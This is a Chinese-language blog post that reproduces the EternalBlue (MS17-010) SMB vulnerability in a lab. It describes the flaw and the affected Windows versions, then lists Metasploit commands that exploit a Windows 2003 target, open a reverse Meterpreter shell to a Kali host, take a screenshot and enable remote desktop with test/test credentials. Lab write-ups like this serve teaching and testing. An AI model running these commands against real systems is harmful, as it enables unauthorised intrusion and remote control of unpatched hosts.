永恒之蓝(ms17_010)漏洞复现

发布于 2022-02-22  1937 次阅读


  1. 1、 漏洞描述
    ①SMB协议是一 个通过网络在共享文件、打印设备、命名管道、邮槽之间操作数据的协议。利用该协议,客户端就可以去访问服务器上的共享文件和目录(增删改查)、打印队列和进程间通信服务等,还可以实现客户端和服务器之间的远程过程子协议的认证传输。
    ②Windows的SMB服务处理 SMBv1接收的特殊设计的数据包,发生缓冲区溢出,导致攻击者在目标系统上可以执行任意代码。2、漏洞威胁
    能远程主动发起对漏洞主机135\137\138\139\445端口的扫描,并且能直接获得漏洞主机的系统权限,属于最高严重级别的漏洞。

    3、漏洞影响范围
    Windows XP、 Windows Server 2003. Windows Vista、Windows Server 2008、 Windows 7. Windows Server2008 R2、Windows 8.1、Windows Server 2012. Windows10、Windows Server 2012 R2、Windows Server 2016

  2. 实验一(利用msf攻击win2003)
    靶机(win2003)192.168.21.132
    kali:192.168.21.128

    1. msfconsole   进入msf
    2. search ms17_010  查询ms17_010漏洞的攻击脚本(exp/poc)
    3. use exploit/windows/smb/ms17_010_psexec    用这个攻击脚本
    4. show options     查看攻击脚本的设置
    5. set RhOSTS 192.168.21.132    根据脚本提示设置攻击目标
    6. set LHOST 192.168.21.128       根据脚本提示设置反弹shell的目标(也就是kali的ip)
    7. run    开始攻击
    8. 攻击成功反弹meterpreter >
      1. screenshot   截取靶机的桌面形成照片
      2. 开启3389远程桌面连接
      3. run post/windows/manage/enable_rdp username=test password=test  直接开启远程桌面
      4. 更多操作
子夜不哭
最后更新于 2022-02-22